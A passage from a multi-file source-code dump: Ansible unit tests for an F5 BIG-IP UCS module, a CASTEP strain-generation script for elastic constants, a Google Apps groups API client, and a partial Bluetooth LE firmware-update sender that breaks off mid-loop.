no_license=False,
no_platform_check=False,
reset_trust=False
)
p = Parameters(params=args)
assert p.ucs == '/root/bigip.localhost.localdomain.ucs'
assert p.include_chassis_level_config is False
assert p.no_license is False
assert p.no_platform_check is False
assert p.reset_trust is False
assert p.install_command == "tmsh load sys ucs /var/local/ucs/bigip.localhost.localdomain.ucs"
class TestV1Manager(unittest.TestCase):
def setUp(self):
self.spec = ArgumentSpec()
self.patcher1 = patch('time.sleep')
self.patcher1.start()
def tearDown(self):
self.patcher1.stop()
def test_ucs_default_present(self, *args):
set_module_args(dict(
ucs="/root/bigip.localhost.localdomain.ucs",
server='localhost',
password='password',
user='admin'
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.is_version_v1 = Mock(return_value=True)
vm = V1Manager(module=module)
vm.create_on_device = Mock(return_value=True)
vm.exists = Mock(side_effect=[False, True])
results = vm.exec_module()
assert results['changed'] is True
def test_ucs_explicit_present(self, *args):
set_module_args(dict(
ucs="/root/bigip.localhost.localdomain.ucs",
server='localhost',
password='password',
user='admin',
state='present'
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.is_version_v1 = Mock(return_value=True)
vm = V1Manager(module=module)
vm.create_on_device = Mock(return_value=True)
vm.exists = Mock(side_effect=[False, True])
results = vm.exec_module()
assert results['changed'] is True
def test_ucs_installed(self, *args):
set_module_args(dict(
ucs="/root/bigip.localhost.localdomain.ucs",
server='localhost',
password='password',
user='admin',
state='installed'
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.is_version_v1 = Mock(return_value=True)
vm = V1Manager(module=module)
vm.create_on_device = Mock(return_value=True)
vm.exists = Mock(return_value=True)
vm.install_on_device = Mock(return_value=True)
results = vm.exec_module()
assert results['changed'] is True
def test_ucs_absent_exists(self, *args):
set_module_args(dict(
ucs="/root/bigip.localhost.localdomain.ucs",
server='localhost',
password='password',
user='admin',
state='absent'
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.is_version_v1 = Mock(return_value=True)
vm = V1Manager(module=module)
vm.remove_from_device = Mock(return_value=True)
vm.exists = Mock(side_effect=[True, False])
results = vm.exec_module()
assert results['changed'] is True
def test_ucs_absent_fails(self, *args):
set_module_args(dict(
ucs="/root/bigip.localhost.localdomain.ucs",
server='localhost',
password='password',
user='admin',
state='absent'
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.is_version_v1 = Mock(return_value=True)
vm = V1Manager(module=module)
vm.remove_from_device = Mock(return_value=True)
vm.exists = Mock(side_effect=[True, True])
with pytest.raises(F5ModuleError) as ex:
vm.exec_module()
assert 'Failed to delete' in str(ex.value)
class TestV2Manager(unittest.TestCase):
def setUp(self):
self.spec = ArgumentSpec()
def test_ucs_default_present(self, *args):
set_module_args(dict(
ucs="/root/bigip.localhost.localdomain.ucs",
server='localhost',
password='password',
user='admin'
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.is_version_v1 = Mock(return_value=False)
vm = V2Manager(module=module)
vm.create_on_device = Mock(return_value=True)
vm.exists = Mock(side_effect=[False, True])
results = vm.exec_module()
assert results['changed'] is True
def test_ucs_explicit_present(self, *args):
set_module_args(dict(
ucs="/root/bigip.localhost.localdomain.ucs",
server='localhost',
password='password',
user='admin',
state='present'
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.is_version_v1 = Mock(return_value=False)
vm = V2Manager(module=module)
vm.create_on_device = Mock(return_value=True)
vm.exists = Mock(side_effect=[False, True])
results = vm.exec_module()
assert results['changed'] is True
def test_ucs_installed(self, *args):
set_module_args(dict(
ucs="/root/bigip.localhost.localdomain.ucs",
server='localhost',
password='password',
user='admin',
state='installed'
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.is_version_v1 = Mock(return_value=False)
vm = V2Manager(module=module)
vm.create_on_device = Mock(return_value=True)
vm.exists = Mock(return_value=True)
vm.install_on_device = Mock(return_value=True)
results = vm.exec_module()
assert results['changed'] is True
def test_ucs_absent_exists(self, *args):
set_module_args(dict(
ucs="/root/bigip.localhost.localdomain.ucs",
server='localhost',
password='password',
user='admin',
state='absent'
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.is_version_v1 = Mock(return_value=False)
vm = V1Manager(module=module)
vm.remove_from_device = Mock(return_value=True)
vm.exists = Mock(side_effect=[True, False])
results = vm.exec_module()
assert results['changed'] is True
def test_ucs_absent_fails(self, *args):
set_module_args(dict(
ucs="/root/bigip.localhost.localdomain.ucs",
server='localhost',
password='password',
user='admin',
state='absent'
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.is_version_v1 = Mock(return_value=False)
vm = V1Manager(module=module)
vm.remove_from_device = Mock(return_value=True)
vm.exists = Mock(side_effect=[True, True])
with pytest.raises(F5ModuleError) as ex:
vm.exec_module()
assert 'Failed to delete' in str(ex.value)
|
andreww/elastic-constants
|
refs/heads/master
|
generate_strain.py
|
1
|
#!/usr/bin/env python
"""
generate_strain.py
Generate strained castep input files and
.cijdat files for elastic constants calculation
for analysis with elastics.py
Copyright (c) 2010-2020 Andrew Walker <a.walker@leeds.ac.uk>
All rights reserved.
"""
from __future__ import print_function
import sys
import os
import optparse
import re
import numpy as np
import castep
version = 0.1
def PointGroup2StrainPat(pointgroup):
"""
Converts point group number (as ordered by CASTEP
and in the International Tables) to a number representing
the needed strain pattern.
"""
supcode = 0
if (pointgroup < 1):
print("Point group number " + str(pointgroup) + " not recognized.")
sys.exit(1)
elif (pointgroup <= 2):
# Triclinic
patt = 1
elif (pointgroup <= 5):
# Monoclinic
patt = 2
elif (pointgroup <= 8):
# Orthorhombic
patt = 3
elif (pointgroup <= 15):
# Tetragonal
patt = 4
elif (pointgroup <= 17):
# Trigonal-Low
patt = 6
elif (pointgroup <= 20):
# Trigonal-High
patt = 7
supcode = 1
elif (pointgroup <= 27):
# Hexagonal
patt = 7
elif (pointgroup <= 32):
# Cubic
patt = 5
else:
print("Point group number " + str(pointgroup) + " not recognized.\n")
sys.exit(1)
return patt, supcode
def GetStrainPatterns(code, supcode):
"""
Given a code number for the crystal symmetry,
returns a list of strain patterns needed for
the calculation of the elastic constants tensor.
Each pattern is a 6 element list, the subscript
reflects the strain in IRE notation
Supported Strain Patterns
-------------------------
5 Cubic: e1+e4
7 Hexagonal: e3 and e1+e4
7 Trigonal-High (32, 3m, -3m): e1 and e3+e4
6 Trigonal-Low (3, -3): e1 and e3+e4
4 Tetragonal: e1+e4 and e3+e6
3 Orthorhombic: e1+e4 and e2+e5 and e3+e6
2 Monoclinic: e1+e4 and e3+e6 and e2 and e5
1 Triclinic: e1 to e6 separately
0 Unknown...
"""
if (code == 1):
pattern = [[1.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 1.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 1.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 1.0]]
elif (code == 2):
pattern = [[1.0, 0.0, 0.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 1.0, 0.0, 0.0, 1.0],
[0.0, 1.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 1.0, 0.0]]
elif (code == 3):
pattern = [[1.0, 0.0, 0.0, 1.0, 0.0, 0.0],
[0.0, 1.0, 0.0, 0.0, 1.0, 0.0],
[0.0, 0.0, 1.0, 0.0, 0.0, 1.0]]
elif (code == 4):
pattern = [[1.0, 0.0, 0.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 1.0, 0.0, 0.0, 1.0]]
elif (code == 5):
pattern = [[1.0, 0.0, 0.0, 1.0, 0.0, 0.0]]
elif (code == 6):
pattern = [[1.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 1.0, 1.0, 0.0, 0.0]]
elif (code == 7):
# NB is this correct for hex and hig trig? - see missmatch above/
# I suspect I have to rotate lattice for trig high?
pattern = [[0.0, 0.0, 1.0, 0.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 1.0, 0.0, 0.0]]
if supcode == 1:
pattern = [[1.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 1.0, 1.0, 0.0, 0.0]]
return pattern
def get_options(input_options, libmode):
"""
Just extracts the command line arguments into an options object
"""
if not libmode:
p = optparse.OptionParser(usage="%prog [options] seedname\n" +
"Generate CASTEP input for elastic constants calculation",
version="%prog "+str(version))
p.add_option('--debug', '-d', action='store_true',
help="Debug mode (output to stdout rather than file)")
p.add_option('--steps', '-n', action='store', type='int',
dest="numsteps",
help='Number of positive strain magnitudes to impose' +
' (defaults to 3)')
p.add_option('--strain', '-s', action='store', type='float',
dest="strain", help='Maximum magnitude of deformation to' +
' produced strained cells (defaults to 0.1)')
p.add_option('--lattice', '-l', action='store', type='int',
dest="lattice", help='Lattice type to set pattern of' +
' deformation (extracted from .castep file)')
options,arguments = p.parse_args(args=input_options)
return options, arguments
def cellABC2cellCART (a, b, c, alp, bet, gam, Convention=1):
"""
Given three lattice vector lengths and angles, returns
three vectors (as list of lists:
[[a_x, a_y, a_z], [b_x, b_y, b_z], [c_x, c_y, c_z]]) representing
the vectors on a cartisian frame.
"""
# Get lattice vetors on cart frame from a, b, c and angles
# For monoclinic, b // Y and c // Z
if (alp == 90.0):
sina = 1.0
cosa = 0.0
else:
sina = np.sin(np.radians(alp))
cosa = np.cos(np.radians(alp))
if (bet == 90.0):
sinb = 1.0
cosb = 0.0
else:
sinb = np.sin(np.radians(bet))
cosb = np.cos(np.radians(bet))
if (gam == 90.0):
sing = 1.0
cosg = 0.0
else:
sing = np.sin(np.radians(gam))
cosg = np.cos(np.radians(gam))
c_x = 0.0
c_y = 0.0
c_z = c
b_x = 0.0
b_y = b*sina
b_z = b*cosa
a_z = a*cosb
a_y = a*(cosg - cosa*cosb)/sina
trm1 = a_y/a
a_x = a*np.sqrt(1.0 - cosb**2 - trm1**2)
return [[a_x, a_y, a_z], [b_x, b_y, b_z], [c_x, c_y, c_z]]
def cellCART2cellABC (lattice):
"""
Given three latice vectors (with three componets each) return
the lattice vector lengths and angles between them. Input argument
should be [[a_x, a_y, a_z], [b_x, b_y, bz], [c_x, c_y, c_z]]. Angles
returned in degrees.
"""
# Does not care about orentation...
a = np.sqrt(lattice[0][0]**2 + lattice[0][1]**2 + lattice[0][2]**2)
b = np.sqrt(lattice[1][0]**2 + lattice[1][1]**2 + lattice[1][2]**2)
c = np.sqrt(lattice[2][0]**2 + lattice[2][1]**2 + lattice[2][2]**2)
gam = np.arccos(np.dot(lattice[0],lattice[1]) / (a*b))
bet = np.arccos(np.dot(lattice[0],lattice[2]) / (a*c))
alp = np.arccos(np.dot(lattice[1],lattice[2]) / (b*c))
return a, b, c, np.degrees(alp), np.degrees(bet), np.degrees(gam)
def main(input_options, libmode=False):
# deal with options
options, arguments = get_options(input_options, libmode)
seedname = arguments[0]
(cell,pointgroup,atoms) = castep.parse_dotcastep(seedname)
# Re-align lattice vectors on cartisian system
a, b, c, al, be, ga = cellCART2cellABC(cell)
cell = cellABC2cellCART(a, b, c, al, be, ga)
# Not sure why the lattice types are enumerated like this, but this
# is how .cijdat does it...
latticeTypes = {0:"Unknown", 1:"Triclinic", 2:"Monoclinic",
3:"Orthorhombic", 4:"Tetragonal", 5:"Cubic",
6:"Trigonal-low", 7:"Trigonal-high/Hexagonal"}
maxstrain = options.strain
if (maxstrain == None):
maxstrain = 0.1
numsteps = options.numsteps
if (numsteps == None):
numsteps = 3
# Which strain pattern to use?
if (options.lattice == None):
if (pointgroup == None):
# Nothing from user and nothing from
# .castep: we are in trouble
print("No point group found in .castep file so the strain pattern cannot be determined")
print("A strain pattern can also be provided using the -l flag")
sys.exit(1)
else:
# Use the value from .castep
latticeCode, supcode = PointGroup2StrainPat(pointgroup)
else:
if (pointgroup == None):
# Noting in .castep - use users choice
latticeCode = options.lattice
else:
# Use users choice, but check and warn
latticeCode = options.lattice
if (latticeCode != PointGroup2StrainPat(pointgroup)[0]):
print("WARNING: User supplied lattice code is inconsistant with the point group")
print(" found by CASTEP. Using user supplied lattice code.")
print("Cell parameters: a = %f gamma = %f" % (a, al))
print(" b = %f beta = %f" % (b, be))
print(" c = %f gamma = %f \n" % (c, ga))
print("Lattce vectors: %7f %7f %7f " % (cell[0][0], cell[0][1], cell[0][2]))
print(" %7f %7f %7f " % (cell[1][0], cell[1][1], cell[1][2]))
print(" %7f %7f %7f \n " % (cell[2][0], cell[2][1], cell[2][2]))
patterns = GetStrainPatterns(latticeCode, supcode)
numStrainPatterns = len(patterns)
print("Lattice type is ", latticeTypes[latticeCode])
print("Number of patterns: "+ str(numStrainPatterns) +"\n")
cijdat = open(seedname+".cijdat","w")
print("Writing strain data to ", seedname+".cijdat")
cijdat.write(str(latticeCode) + ' ' + str(numsteps*2) + ' 0 ' + '0 \n')
cijdat.write(str(maxstrain)+"\n")
# The order of these three loops matters for the analysis code.
for patt in range(numStrainPatterns):
this_pat = patterns[patt]
for a in range(0,numsteps):
for neg in range(0,2):
if (neg == 0):
this_mag = (float(a)+1) / (float(numsteps)) * maxstrain
else:
this_mag = -1.0 * (float(a)+1) / (float(numsteps)) * maxstrain
disps = [x * this_mag for x in patterns[patt]]
# Build the strain tensor (IRE convention but 1 -> 0 etc.)
this_strain = [1.0, 1.0, 1.0, 1.0, 1.0, 1.0]
# diagonal elements - strain is displacment / lattice vector length
this_strain[0] = disps[0] / np.sqrt(cell[0][0]**2+cell[0][1]**2+cell[0][2]**2)
this_strain[1] = disps[1] / np.sqrt(cell[1][0]**2+cell[1][1]**2+cell[1][2]**2)
this_strain[2] = disps[2] / np.sqrt(cell[2][0]**2+cell[2][1]**2+cell[2][2]**2)
# off diagonals - we only strain upper right corner of cell matrix, so strain is 1/2*du/dx...
this_strain[3] = 0.5 * (disps[3] / np.sqrt(cell[1][0]**2+cell[1][1]**2+cell[1][2]**2))
this_strain[4] = 0.5 * (disps[4] / np.sqrt(cell[0][0]**2+cell[0][1]**2+cell[0][2]**2))
this_strain[5] = 0.5 * (disps[5] / np.sqrt(cell[0][0]**2+cell[0][1]**2+cell[0][2]**2))
# Deform cell - only apply deformation to upper right corner
defcell = [[cell[0][0]+disps[0], cell[0][1]+disps[5], cell[0][2]+disps[4]],
[cell[1][0], cell[1][1]+disps[1], cell[1][2]+disps[3]],
[cell[2][0], cell[2][1], cell[2][2]+disps[2]]]
pattern_name = seedname + "_cij__" + str(patt+1) + "__" + str((a*2)+1+neg)
print("Pattern Name = ", pattern_name)
print("Pattern = ", this_pat)
print("Magnitude = ", this_mag)
cijdat.write(pattern_name+"\n")
cijdat.write(str(this_strain[0]) + " " + str(this_strain[5]) + " " + str(this_strain[4]) + "\n")
cijdat.write(str(this_strain[5]) + " " + str(this_strain[1]) + " " + str(this_strain[3]) + "\n")
cijdat.write(str(this_strain[4]) + " " + str(this_strain[3]) + " " + str(this_strain[2]) + "\n")
castep.produce_dotcell(seedname, pattern_name+".cell", defcell, atoms)
os.symlink(seedname+".param", pattern_name+".param")
if __name__ == "__main__":
main(sys.argv[1:])
|
kuri65536/python-for-android
|
refs/heads/master
|
python-build/python-libs/gdata/build/lib/gdata/apps/groups/service.py
|
137
|
#!/usr/bin/python
#
# Copyright (C) 2008 Google, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Allow Google Apps domain administrators to manage groups, groups memembers and groups owners.
EmailSettingsService: Set various email settings.
"""
__author__ = 'google-apps-apis@googlegroups.com'
import gdata.apps
import gdata.apps.service
import gdata.service
API_VER='2.0'
BASE_URL = '/a/feeds/group/' + API_VER + '/%s'
GROUP_MEMBER_URL = BASE_URL + '?member=%s'
GROUP_MEMBER_DIRECT_URL = GROUP_MEMBER_URL + '&directOnly=%s'
GROUP_ID_URL = BASE_URL + '/%s'
MEMBER_URL = BASE_URL + '/%s/member'
MEMBER_ID_URL = MEMBER_URL + '/%s'
OWNER_URL = BASE_URL + '/%s/owner'
OWNER_ID_URL = OWNER_URL + '/%s'
PERMISSION_OWNER = 'Owner'
PERMISSION_MEMBER = 'Member'
PERMISSION_DOMAIN = 'Domain'
PERMISSION_ANYONE = 'Anyone'
class GroupsService(gdata.apps.service.PropertyService):
"""Client for the Google Apps Groups service."""
def _ServiceUrl(self, service_type, is_existed, group_id, member_id, owner_email,
start_key, direct_only=None, domain=None):
if domain is None:
domain = self.domain
if service_type == 'group':
if group_id != '' and is_existed:
return GROUP_ID_URL % (domain, group_id)
if member_id != '':
if direct_only is not None:
return GROUP_MEMBER_DIRECT_URL % (domain, member_id,
self._Bool2Str(direct_only))
else:
return GROUP_MEMBER_URL % (domain, member_id)
if start_key != '':
return GROUP_START_URL % (domain, start_key)
return BASE_URL % (domain)
if service_type == 'member':
if member_id != '' and is_existed:
return MEMBER_ID_URL % (domain, group_id, member_id)
if start_key != '':
return MEMBER_START_URL % (domain, group_id, start_key)
return MEMBER_URL % (domain, group_id)
if service_type == 'owner':
if owner_email != '' and is_existed:
return OWNER_ID_URL % (domain, group_id, owner_email)
return OWNER_URL % (domain, group_id)
def _Bool2Str(self, b):
if b is None:
return None
return str(b is True).lower()
def _IsExisted(self, uri):
try:
properties = self._GetProperties(uri)
return True
except gdata.apps.service.AppsForYourDomainException, e:
if e.error_code == gdata.apps.service.ENTITY_DOES_NOT_EXIST:
return False
else:
raise e
def CreateGroup(self, group_id, group_name, description, email_permission):
"""Create a group.
Args:
group_id: The ID of the group (e.g. us-sales).
group_name: The name of the group.
description: A description of the group
email_permission: The subscription permission of the group.
Returns:
A dict containing the result of the create operation.
"""
uri = self._ServiceUrl('group', False, group_id, '', '', '', '')
properties = {}
properties['groupId'] = group_id
properties['groupName'] = group_name
properties['description'] = description
properties['emailPermission'] = email_permission
return self._PostProperties(uri, properties)
def UpdateGroup(self, group_id, group_name, description, email_permission):
"""Update a group's name, description and/or permission.
Args:
group_id: The ID of the group (e.g. us-sales).
group_name: The name of the group.
description: A description of the group
email_permission: The subscription permission of the group.
Returns:
A dict containing the result of the update operation.
"""
uri = self._ServiceUrl('group', True, group_id, '', '', '', '')
properties = {}
properties['groupId'] = group_id
properties['groupName'] = group_name
properties['description'] = description
properties['emailPermission'] = email_permission
return self._PutProperties(uri, properties)
def RetrieveGroup(self, group_id):
"""Retrieve a group based on its ID.
Args:
group_id: The ID of the group (e.g. us-sales).
Returns:
A dict containing the result of the retrieve operation.
"""
uri = self._ServiceUrl('group', True, group_id, '', '', '', '')
return self._GetProperties(uri)
def RetrieveAllGroups(self):
"""Retrieve all groups in the domain.
Args:
None.
Returns:
A dict containing the result of the retrieve operation.
"""
uri = self._ServiceUrl('group', True, '', '', '', '', '')
return self._GetPropertiesList(uri)
def RetrieveGroups(self, member_id, direct_only=False):
"""Retrieve all groups that belong to the given member_id.
Args:
member_id: The member's email address (e.g. member@example.com).
direct_only: Boolean whether only return groups that this member directly belongs to.
Returns:
A dict containing the result of the retrieve operation.
"""
uri = self._ServiceUrl('group', True, '', member_id, '', '', direct_only)
return self._GetPropertiesList(uri)
def DeleteGroup(self, group_id):
"""Delete a group based on its ID.
Args:
group_id: The ID of the group (e.g. us-sales).
Returns:
A dict containing the result of the delete operation.
"""
uri = self._ServiceUrl('group', True, group_id, '', '', '', '')
return self._DeleteProperties(uri)
def AddMemberToGroup(self, member_id, group_id):
"""Add a member to a group.
Args:
member_id: The member's email address (e.g. member@example.com).
group_id: The ID of the group (e.g. us-sales).
Returns:
A dict containing the result of the add operation.
"""
uri = self._ServiceUrl('member', False, group_id, member_id, '', '', '')
properties = {}
properties['memberId'] = member_id
return self._PostProperties(uri, properties)
def IsMember(self, member_id, group_id):
"""Check whether the given member already exists in the given group
Args:
member_id: The member's email address (e.g. member@example.com).
group_id: The ID of the group (e.g. us-sales).
Returns:
True if the member exists in the group. False otherwise.
"""
uri = self._ServiceUrl('member', True, group_id, member_id, '', '', '')
return self._IsExisted(uri)
def RetrieveMember(self, member_id, group_id):
"""Retrieve the given member in the given group
Args:
member_id: The member's email address (e.g. member@example.com).
group_id: The ID of the group (e.g. us-sales).
Returns:
A dict containing the result of the retrieve operation.
"""
uri = self._ServiceUrl('member', True, group_id, member_id, '', '', '')
return self._GetProperties(uri)
def RetrieveAllMembers(self, group_id):
"""Retrieve all members in the given group.
Args:
group_id: The ID of the group (e.g. us-sales).
Returns:
A dict containing the result of the retrieve operation.
"""
uri = self._ServiceUrl('member', True, group_id, '', '', '', '')
return self._GetPropertiesList(uri)
def RemoveMemberFromGroup(self, member_id, group_id):
"""Remove the given member from the given group
Args:
group_id: The ID of the group (e.g. us-sales).
member_id: The member's email address (e.g. member@example.com).
Returns:
A dict containing the result of the remove operation.
"""
uri = self._ServiceUrl('member', True, group_id, member_id, '', '', '')
return self._DeleteProperties(uri)
def AddOwnerToGroup(self, owner_email, group_id):
"""Add an owner to a group.
Args:
owner_email: The email address of a group owner.
group_id: The ID of the group (e.g. us-sales).
Returns:
A dict containing the result of the add operation.
"""
uri = self._ServiceUrl('owner', False, group_id, '', owner_email, '', '')
properties = {}
properties['email'] = owner_email
return self._PostProperties(uri, properties)
def IsOwner(self, owner_email, group_id):
"""Check whether the given member an owner of the given group.
Args:
owner_email: The email address of a group owner.
group_id: The ID of the group (e.g. us-sales).
Returns:
True if the member is an owner of the given group. False otherwise.
"""
uri = self._ServiceUrl('owner', True, group_id, '', owner_email, '', '')
return self._IsExisted(uri)
def RetrieveOwner(self, owner_email, group_id):
"""Retrieve the given owner in the given group
Args:
owner_email: The email address of a group owner.
group_id: The ID of the group (e.g. us-sales).
Returns:
A dict containing the result of the retrieve operation.
"""
uri = self._ServiceUrl('owner', True, group_id, '', owner_email, '', '')
return self._GetProperties(uri)
def RetrieveAllOwners(self, group_id):
"""Retrieve all owners of the given group
Args:
group_id: The ID of the group (e.g. us-sales).
Returns:
A dict containing the result of the retrieve operation.
"""
uri = self._ServiceUrl('owner', True, group_id, '', '', '', '')
return self._GetPropertiesList(uri)
def RemoveOwnerFromGroup(self, owner_email, group_id):
"""Remove the given owner from the given group
Args:
owner_email: The email address of a group owner.
group_id: The ID of the group (e.g. us-sales).
Returns:
A dict containing the result of the remove operation.
"""
uri = self._ServiceUrl('owner', True, group_id, '', owner_email, '', '')
return self._DeleteProperties(uri)
|
lavallc/ion
|
refs/heads/master
|
bootloader/flashing_utils/ble_dfu_send_hex/dfu/ble_dfu.py
|
1
|
import time
from intelhex import IntelHex
from dfu.master_emulator import MasterEmulator
import System
import Nordicsemi
# DFU OpCodes
class OpCodes:
START_DFU = 1
INITIALIZE_DFU = 2
RECEIVE_FIRMWARE_IMAGE = 3
VALIDATE_FIRMWARE_IMAGE = 4
ACTIVATE_FIRMWARE_AND_RESET = 5
SYSTEM_RESET = 6
REQ_PKT_RCPT_NOTIF = 8
RESPONSE = 16
PKT_RCPT_NOTIF = 17
# Textual description lookup table for status codes received from peer.
status_code_lookup = {
1: "SUCCESS",
2: "Invalid State",
3: "Not Supported",
4: "Data Size Exceeds Limit",
5: "CRC Error",
6: "Operation Failed"
}
# Helper functions
def create_byte_array(size, value=0x55):
""" Create a IronPython byte array with initial value. """
return System.Array[System.Byte]([value]*size)
def convert_uint32_to_array(value):
""" Convert a number into an array of 4 bytes (LSB). """
return [(value >> 0 & 0xFF), (value >> 8 & 0xFF),
(value >> 16 & 0xFF), (value >> 24 & 0xFF)]
def convert_uint16_to_array(value):
""" Convert a number into an array of 2 bytes (LSB). """
return [(value >> 0 & 0xFF), (value >> 8 & 0xFF)]
# Service UUID
uuid_dfu_service = Nordicsemi.BtUuid('000015301212EFDE1523785FEABCD123')
# Characteristic UUID
uuid_dfu_control_state_characteristic = Nordicsemi.BtUuid('000015311212EFDE1523785FEABCD123')
uuid_dfu_packet_characteristic = Nordicsemi.BtUuid('000015321212EFDE1523785FEABCD123')
#Descriptor UUID
uuid_client_characteristic_configuration_descriptor = Nordicsemi.BtUuid(0x2902)
# number of retries for sending a packet
num_of_send_tries = 1
# NOTE: If packet receipt notification is enabled, a packet receipt
# notification will be received for each 'num_of_packets_between_notif'
# number of packets.
#
# Configuration tip: Increase this to get lesser notifications from the DFU
# Target about packet receipts. Make it 0 to disable the packet receipt
# notification
num_of_packets_between_notif = 0
class BleDfu(MasterEmulator):
""" Class to handle upload of a new hex image to the peer device. """
def __init__(self, peer_device_name, peer_device_address, hexfile_path):
super(BleDfu, self).__init__(peer_device_name,
peer_device_address)
self.hexfile_path = hexfile_path
self.ready_to_send = True
def data_received_handler(self, sender, e):
""" Handle received data from the peer device.
Note: This function overrides the parent class.
"""
if (e.PipeNumber == self.pipe_dfu_control_point_notify):
op_code = int(e.PipeData[0])
if op_code == OpCodes.PKT_RCPT_NOTIF:
if self.ready_to_send == True:
self.log_handler.log("ERROR: !!!! Pkt receipt notification received when it is not expected")
else:
self.log_handler.log("Pkt receipt notification received.")
self.log_handler.log("Number of bytes LSB = {0}".format(e.PipeData[1]))
self.log_handler.log("Number of bytes MSB = {0}".format(e.PipeData[2]))
self.ready_to_send = True
elif op_code == OpCodes.RESPONSE:
request_op_code = int(e.PipeData[1])
response_value = int(e.PipeData[2])
self.log_handler.log("Response received for Request Op Code = {0}".format(request_op_code))
status_text = "UNKNOWN"
if status_code_lookup.has_key(response_value):
status_text = status_code_lookup[response_value]
if request_op_code == 1:
self.log_handler.log("Response for 'Start DFU' received - Status: %s" % status_text)
elif request_op_code == 2:
self.log_handler.log("Response for 'Initialize DFU Params' received - Status: %s" % status_text)
elif request_op_code == 3:
self.log_handler.log("Response for 'Receive FW Data' received - Status: %s" % status_text)
elif request_op_code == 4:
self.log_handler.log("Response for 'Validate' received - Status: %s" % status_text)
else:
self.log_handler.log("!!ERROR!! Response for Unknown command received.")
else:
self.log_handler.log("Received data on unexpected pipe %r"%e.PipeNumber)
def setup_service(self):
""" Set up DFU service database. """
# Add DFU Service
self.master.SetupAddService(uuid_dfu_service, Nordicsemi.PipeStore.Remote)
# Add DFU characteristics
self.master.SetupAddCharacteristicDefinition(uuid_dfu_packet_characteristic, 2, create_byte_array(2))
self.pipe_dfu_packet = self.master.SetupAssignPipe(Nordicsemi.PipeType.Transmit)
self.master.SetupAddCharacteristicDefinition(uuid_dfu_control_state_characteristic, 2, create_byte_array(2))
self.pipe_dfu_control_point = self.master.SetupAssignPipe(Nordicsemi.PipeType.TransmitWithAck)
self.pipe_dfu_control_point_notify = self.master.SetupAssignPipe(Nordicsemi.PipeType.Receive)
self.master.SetupAddCharacteristicDescriptor(uuid_client_characteristic_configuration_descriptor, 2, create_byte_array(2))
self.pipe_dfu_cccd_control_point_write = self.master.SetupAssignPipe(Nordicsemi.PipeType.TransmitWithAck)
def dfu_send_image(self):
""" Send hex to peer in chunks of 20 bytes. """
if not self.connected:
return
# Open the hex file to be sent
ih = IntelHex(self.hexfile_path)
bin_array = ih.tobinarray()
hex_size = len(bin_array)
hex_size_array_lsb = convert_uint32_to_array(len(bin_array))
# CCCD Enable notification bytes
enable_notifications = System.Array[System.Byte](convert_uint16_to_array(0001))
start_time = time.time()
# Setting the DFU Control Point - CCCD to 0x0001
self.send_data(self.pipe_dfu_cccd_control_point_write,
enable_notifications,
num_of_send_tries,
"Enabling DFU control point notification")
if num_of_packets_between_notif:
# Subscribing for packet receipt notifications
self.send_data(self.pipe_dfu_control_point,
System.Array[System.Byte]([OpCodes.REQ_PKT_RCPT_NOTIF] + convert_uint16_to_array(num_of_packets_between_notif)),
num_of_send_tries,
"Enabling Packet receipt notifications from peer device")
# Sending 'START DFU' command
self.send_data(self.pipe_dfu_control_point,
System.Array[System.Byte]([OpCodes.START_DFU]),
num_of_send_tries,
"Sending 'START DFU' command")
# Sending image size
self.send_data(self.pipe_dfu_packet,
System.Array[System.Byte](hex_size_array_lsb),
num_of_send_tries,
"Sending image size")
# Send 'RECEIVE FIRMWARE IMAGE' command to set DFU in firmware receive state.
self.send_data(self.pipe_dfu_control_point,
System.Array[System.Byte]([OpCodes.RECEIVE_FIRMWARE_IMAGE]),
num_of_send_tries,
"Send 'RECEIVE FIRMWARE IMAGE' command")
self.ready_to_send = True;
pkts_sent = 0;
# Send application data packets
for i in range(0, hex_size, 20):
